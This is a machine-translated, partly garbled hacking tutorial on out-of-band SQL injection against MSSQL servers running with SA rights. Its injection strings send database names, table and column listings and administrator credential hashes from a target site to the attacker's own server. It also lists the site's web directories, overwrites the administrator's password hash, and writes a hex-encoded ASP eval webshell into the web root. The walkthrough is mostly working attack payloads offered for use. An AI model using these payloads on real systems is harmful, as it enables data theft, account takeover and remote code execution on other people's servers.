Mssql rebound injection recording collection

One night, when I studied a SA injection point, Hua B sent me some information and sent a record. Changing the administrator password is getting worse and worse; update [user] set [pwd] 1519804e89226cf9893a05d9e3fc8bbbwhere [LogonName] hmingming; column directory createdatabasetest (local database creation) (local execution on

One night, when I was studying a SA injection point, Hua B sent me some information,

Send a record. The brain shell is getting worse and worse.

Change administrator password

'; UpDate[User]Set[Pwd] = '1519804e89226cf9893a05d9e3fc8bbb 'where [LogonName] = 'hmingming ';-

-----------------------------
Column directory
Create database test (local database creation)

(Execute locally to create tables and fields in the TEST database above)

Use test create table temp (IdNvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ))

-------------------------------------------------------
Test whether it is connected to the local data (the injection point is executed)

insert into openrowset('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima','select id from test.dbo.temp1') select name from master.dbo.sysdatabases--

NetStat-An |Find"1433" (local execution)

Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ))-
(Run locally and use the query analyzer in the database test)

'; Drop table temp-(injection point execution to avoid conflicts with existing tables)
_________________________________________________________________________________
(Execute injection points to create tables and fields to facilitate insertion of the following statements)
'; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ))-

---------------------------------------------------

'; Insert into temp (id, num1, num2)ExEc master. dbo. xp_dirTrEe 'd: \ www \ jiage \ ', 1, 1-

(Execute the injection point, insert the column directory to the TEMP table)
------------------------
(Execute the injection point and copy the column directory to the TEMP1 table of the test database)

';insert intoopendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=test').test.dbo.temp1 select * from temp--

______________________________________________________________
Select * from temp1 (local execution, listing Directories)

'; Delete temp-(execute the injection point to clear the data table)

Delete temp1 (run the local query analyzer and clear the data table)

Despise the Black Hand Peng Chao select * from temp-actually written as select temp from temp-
------------------------------
Guess table
(The following statements are all executed locally)
Create database lcx (database creation)

Create TABLE ku (name nvarchar (256) null); (Create a TABLE to make it easier for the following query to copy the database name to this TABLE)

Create TABLE biao (id int NULL, name nvarchar (256) null); (Create a TABLE to facilitate the following query: Copy to this TABLE

Medium)/nvarchar is the data type, and 256 is the data length. null is the data length. There is no record to make it easy for birds to understand (remember me is also a bird of love )/

____________________________________________________________________________
(Run the injection point to copy all the database names of the queried server to the newly created ku table, let's take a look at the data returned from the "ku" table in the lcx database)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases--

__________________________________________________________________________
(Run the injection point to get the current database name. Before Execution, clear the garbage left by the above statement locally. What? You don't? MYGOD delete ku local query analyzer switch to lcx library for execution)

';Insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.ku select db_name(0)--

__________________________________________________________________________________
(Run the injection point to copy the names of all the current databases on the server to the newly created biao table, let's take a look at the local database and check whether the biao table in the lcx database returns all rows)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.biao select [id],[name] from sysobjects where xtype='U'--

___________________________________________________________________
(Cross-database query cannot be found because the cross-database query is not permitted)

'; Insert into opendatasource ('sqloledb', 'server = x. x. x. x, 1433; uid = fuck; pwd = caonima; database = lcx '). lcx. dbo. biao select [id], [name] from JIAGE % 23@HL0212_Week.dbo.sysobjects where xtype = 'U' -- OK (get the Library, and the table so below we want to guess the content? If you want to eat vitamin Candy, come with me)

_________________________________________________________________________
(The local query analyzer runs in the LCX database and copies the system table sys.ColStructure of umns to tmpcolumns so that the results queried by the following statements can be copied to the tmpcolumns table)
Select * into [tmpcolumns] from syscolumns where 1 = 2-
_________________________________________________________
(Execute the injection point. First, explain id = 558625033 = name = user, which means to query all the column names in the table where the database is the user and copy them to tmpcolumns)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.tmpcolumns select * from syscolumns where id=558625033--

/
When 34 then "image"
When 35 then "text"
When 52 then "smallint"
When 56 then 'int"
When 61 then "dateTime"
When 62 then "float"
When 108 then "numeric"
When 167 then "varchar"
When 175 then "char"
When 231 then "nvarchar"
/

create table caonima([LogonTime] datetime null,[pwd] varchar(200) NULL,[name] varchar(200) null,[LogonName] varchar(200) null,[ZipCode] varchar(200) null);

(Run the local query analyzer. What is the difference between the above table creation and the table creation? It's actually the same, but it's better,

Note that it is best to write other table names in the user table. Do not call the user table at will, because the system may already conflict with this table,

This table is not a random follow me. First, open the table tmpcolumns and read it carefully,

If xtype of pwd is 167, its database type is varchar, and the subsequent length is length,

Is the explanation clear enough? I am not lucky either !)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.caonima select LogonTime,pwd,name,LogonName,ZipCode from [user]--

(Run the injection point operation to copy the query results to the newly created caonima table. Why only three fields are queried?

Think that other things are not sensitive information! Why is there only three column names created above to correspond to this sentence!

Note that the query order is the same as the field order of the created table .)

Okay, so far, we have found that the Administrator's username and password are all about cracking the Administrator's 32MD5HASH,

Cannot be broken? Cmd5.com for money? Me ?, Sorry! Change the password

';update [user] set [pwd]='1519804e89226cf9893a05d9e3fc8bbb' where [LogonName]='hmingming';--

(Change the administrator password at the injection point, and change it to the md5 value of the administrator named hmingming.

Password 2264964 = 1519804e89226cf9893a05d9e3fc8bbb)

Okay. In the above method, we got the administrator password and username. Should we log on to his background? LET's FUCK

Cannot find the subsequent path? Find the top column directory.

It's your own business to get the SHELL in the background. I only teach you how to get it in the background if you can't get it ...... Endure it!

Well, it took me a day to figure out the above spam. It was very hard. Everyone had the money to hold a personal bid without the money,

This was forced by the Administrator. The Administrator had already obtained the website path, but the backuplog was not allowed,

According to the boss of Gao, this permission has been set up. Therefore, with this article, never do this,

Will be exhausted. Unless the target website has a hatred for you. Just a few other nonsense words. Add clothes in the cold weather,

Note: The above methods are implemented when the target IIS blocking error does not report an error. Pay special attention to the above

The server is my big brother. Do not touch my server. It is necessary to describe the user name and password on the local machine.

The SA permission is the premise of the whole nonsense, so some users who build the SA permission.
PS: The boss said there was a rebound injection tool, but the echo was disabled and no error was reported. The tool was useless,

I don't think it is necessary to use a rebound injection tool for speed.

drop table cmd--create table cmd(a char(255))--Insert into cmd(a) values (0x3C254576616C20526571756573742822232229253E)--execute sp_makewebtask @outputfile='D:\www\jiage\test.asp',@query='select a from cmd'--

The above seems to be executed only by SA. It is unknown whether the DB can be executed.

Use this trick when the BACKUPLOG is not good.